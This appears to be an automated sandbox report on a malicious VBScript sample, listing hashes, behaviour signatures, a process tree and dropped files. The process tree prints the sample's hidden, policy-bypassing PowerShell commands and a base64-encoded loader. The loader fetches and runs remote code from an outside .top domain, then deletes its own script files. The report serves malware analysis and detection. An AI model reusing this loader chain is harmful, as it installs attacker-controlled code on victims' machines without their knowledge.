Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/11/2024, 11:22

General

  • Target

    e865a8cc36db489adacecd0932e4b07d9320402532c5e15918c377bbda156c37.vbs

  • Size

    79KB

  • MD5

    af1d73edd871bf6f26fa1561a95a0175

  • SHA1

    235b37402a70e5c7626f6a73d33a7483c628c0ee

  • SHA256

    e865a8cc36db489adacecd0932e4b07d9320402532c5e15918c377bbda156c37

  • SHA512

    8c9bb59ceb94b7c10e4cd7741e5a0ce1d6206b0999a3cdd5befc364e25e38eb3497d930ab64e1f0c8b9b8103bfca195a9489cc331e165c10efddba1d17702c81

  • SSDEEP

    768:vilsosMils8ZiBiMils4iBi5ilsMilsJiBiMilsJiBiwils2CBz/W3WFsMilsJiX:jCBz/09

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e865a8cc36db489adacecd0932e4b07d9320402532c5e15918c377bbda156c37.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4204
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\Admin\AppData\Roaming\dahcJGsr.bat"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4732
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /q /cC:\Users\Admin\AppData\Roaming\dahcJGsr.bat
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4756
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\Admin\AppData\Roaming\dahcJGsr.ps1"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3332
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKCiR1WGxJMVpzTzg2WmJESU5EQ3BuWXRrUWtjTjVsMXZMOXkzTDBLMDdaeHJZakpzbCA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgNSB8ICUge1tjaGFyXSRffSkpOwokT29rN1RNMzZ5NllqID0gW2ludF0oR2V0LURhdGUgLUZvcm1hdCBISCk7CiRTVXlEVG5HNW1oQTZ2cXRFMnlGSjU0ID0gW2ludF0oR2V0LURhdGUgLUZvcm1hdCBtbSk7CiRTVXlEVG5HNW1oQTZ2cXRFMnlGSjU0QWRkID0gMzsKSWYgKCRTVXlEVG5HNW1oQTZ2cXRFMnlGSjU0ICsgJFNVeURUbkc1bWhBNnZxdEUyeUZKNTRBZGQgLWd0IDU5KSB7CiAgICAkT29rN1RNMzZ5NllqID0gJE9vazdUTTM2eTZZaiArIDE7CiAgICAkU1V5RFRuRzVtaEE2dnF0RTJ5Rko1NCA9ICRTVXlEVG5HNW1oQTZ2cXRFMnlGSjU0ICsgJFNVeURUbkc1bWhBNnZxdEUyeUZKNTRBZGQgLSA2MDsKfSBFbHNlIHsKICAgICRTVXlEVG5HNW1oQTZ2cXRFMnlGSjU0ID0gJFNVeURUbkc1bWhBNnZxdEUyeUZKNTQgKyAkU1V5RFRuRzVtaEE2dnF0RTJ5Rko1NEFkZDsKfTsKJE9vazdUTTM2eTZZaiA9IElmIChbaW50XShHZXQtRGF0ZSAtRm9ybWF0IEhIKSArIDEgLWd0IDIzKSB7IjAwIn0gRWxzZSB7JE9vazdUTTM2eTZZan07CiRVaEs3a29ibFowOW8wMmFiRnRQTTN4aERhZ2pCSGxmaHI3VzU5bm5FdXNKbTN5d3VuNEVGYnkwOXJPeWliTUxYID0gJCgtam9pbiAoKDY1Li45MCkgKyAoOTcuLjEyMikgfCBHZXQtUmFuZG9tIC1Db3VudCAxMiB8ICUge1tjaGFyXSRffSkpOwokVWh1b3liV1V6RVJvdDF2R0o5MUFkRFhmcmV0UjBmTndpcE5uRXZTM3FvVG51NkRqU0p1dzRPQ1Q3bk1iY3ZqaGtsRVpDUVhoM1hyWVhESzVyID0gQCIKJEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKY3VybCAtdXNlYiAiaHR0cDovL3JpZ3p1dnppM2JuejMudG9wLzEucGhwP3M9bWludHMxMyIgfCBpZXg7ClJlbW92ZS1JdGVtICJDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXCQoJFVoSzdrb2JsWjA5bzAyYWJGdFBNM3hoRGFnakJIbGZocjdXNTlubkV1c0ptM3l3dW40RUZieTA5ck95aWJNTFgpLnBzMSIgLUZvcmNlIAoiQDsKCiJwb3dlcnNoZWxsIC1ub3Byb2ZpbGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLVdpbmRvd1N0eWxlIGhpZGRlbiAtYyAkKCRVaHVveWJXVXpFUm90MXZHSjkxQWREWGZyZXRSMGZOd2lwTm5FdlMzcW9UbnU2RGpTSnV3NE9DVDduTWJjdmpoa2xFWkNRWGgzWHJZWERLNXIpIiB8IE91dC1GaWxlIC1GaWxlUGF0aCAiQzpcVXNlcnNcUHVibGljXERvY3VtZW50c1wkKCRVaEs3a29ibFowOW8wMmFiRnRQTTN4aERhZ2pCSGxmaHI3VzU5bm5FdXNKbTN5d3VuNEVGYnkwOXJPeWliTUxYKS5wczEiOwpwb3dlcnNoZWxsIC1ub3Byb2ZpbGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLVdpbmRvd1N0eWxlIGhpZGRlbiAtRmlsZSBDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXCQoJFVoSzdrb2JsWjA5bzAyYWJGdFBNM3hoRGFnakJIbGZocjdXNTlubkV1c0ptM3l3dW40RUZieTA5ck95aWJNTFgpLnBzMQpSZW1vdmUtSXRlbSAiJGVudjpBUFBEQVRBXCoucHMxIiAtRm9yY2UKUmVtb3ZlLUl0ZW0gIiRlbnY6QVBQREFUQVwqLmJhdCIgLUZvcmNlCg==')) | iex"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1604
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\eRsFCMmvgfwp.ps1
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4512
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c Continue = Continue
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4236

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    8e42bec1f8f4c3705f1df36c21c85531

    SHA1

    c9d6aac3c1b16ed12f22185ebdc9f921cd396d14

    SHA256

    f3a91001711172cac5380d0409a531f64a8f85666188abb1e4fd0af070ddb9e2

    SHA512

    d8b5b5ad81d6d447a3e1994e3ffb8c75f91452599737bc40b5c0b11668300654b938e92f87718c3f01a70cad26b54f697eb6f70fe95c2dd2357ccd4b8bd24aa6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    782e6de5514b8d845ea665268909b474

    SHA1

    24d88b65fb744147a84d371bc5a30fa26c7e89e5

    SHA256

    1d8b97b9c79d910b03a568ae871c7236bc1eba4cd14c9ba5b66e8bd2d3931520

    SHA512

    873a97d53ca527b21eaa8712274df108494c547cf31a599a71597468868403c5faba7a42a3225667deed0a2793f2a9f87dd4a0764d943a77684d144d17e9ba0f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    5caad758326454b5788ec35315c4c304

    SHA1

    3aef8dba8042662a7fcf97e51047dc636b4d4724

    SHA256

    83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

    SHA512

    4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    50a8221b93fbd2628ac460dd408a9fc1

    SHA1

    7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

    SHA256

    46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

    SHA512

    27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xuq0gyiu.wga.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\dahcJGsr.bat

    Filesize

    127B

    MD5

    60fe766931fd35ab7ef71a58d050d151

    SHA1

    093d3e8ad6589650791b076c293d83fd68a01258

    SHA256

    a2655f4b7688d460aeead5969d386c9b233dd967d74a4b965ae881804ed63df6

    SHA512

    5b6d1457f7ffa926c9a6ac1c70672611d076ca417c2879dc72d3d6b4f492d23cfc49d34d8cddebd8a2f863bedca2059ae679a9a31e418c3cab0952863fe972b4

  • C:\Users\Admin\AppData\Roaming\dahcJGsr.ps1

    Filesize

    2KB

    MD5

    674e9e7128df273743b820de0f086f39

    SHA1

    6ea3b3dd589f01aede4f2fc8cfea1025bb082c9c

    SHA256

    9679e36b28e3d3d0452f1d41855ea65d7256701555624870ce6a4ad53d904be1

    SHA512

    eb0a22da8ab8d981c92c98a1e7ad76f10974ccdf09c50d0f5c1f1df9e701e546b8e853754dde7a6c6f96e05255c1cc16558844946aa5d3e054ac5035ad9d20b2

  • C:\Users\Public\Documents\eRsFCMmvgfwp.ps1

    Filesize

    438B

    MD5

    ee3d16fc08f5ca85284fa3ef16d3d64b

    SHA1

    3cbe0e66c214b0676b263972b790a4ce8f86f51a

    SHA256

    5cf838a725c897738f316d2269ce5272f800ee49454c4b134d9a4281b5509ed9

    SHA512

    f5e15666b09a78b9805c413ddd0a7eaac880017f1f6f180f275d577c4b001f133866b6c0517adda932ed9864aba2b6344a07c03ae8450878d338776bd4891178

  • memory/3332-62-0x00007FFCEC100000-0x00007FFCECBC1000-memory.dmp

    Filesize

    10.8MB

  • memory/3332-28-0x00007FFCEC100000-0x00007FFCECBC1000-memory.dmp

    Filesize

    10.8MB

  • memory/3332-26-0x00007FFCEC100000-0x00007FFCECBC1000-memory.dmp

    Filesize

    10.8MB

  • memory/3332-25-0x00007FFCEC100000-0x00007FFCECBC1000-memory.dmp

    Filesize

    10.8MB

  • memory/3332-70-0x00007FFCEC100000-0x00007FFCECBC1000-memory.dmp

    Filesize

    10.8MB

  • memory/4732-60-0x00007FFCEC103000-0x00007FFCEC105000-memory.dmp

    Filesize

    8KB

  • memory/4732-61-0x00007FFCEC100000-0x00007FFCECBC1000-memory.dmp

    Filesize

    10.8MB

  • memory/4732-2-0x00007FFCEC103000-0x00007FFCEC105000-memory.dmp

    Filesize

    8KB

  • memory/4732-14-0x00007FFCEC100000-0x00007FFCECBC1000-memory.dmp

    Filesize

    10.8MB

  • memory/4732-13-0x00007FFCEC100000-0x00007FFCECBC1000-memory.dmp

    Filesize

    10.8MB

  • memory/4732-12-0x000001EAFBB40000-0x000001EAFBB62000-memory.dmp

    Filesize

    136KB

  • memory/4732-73-0x00007FFCEC100000-0x00007FFCECBC1000-memory.dmp

    Filesize

    10.8MB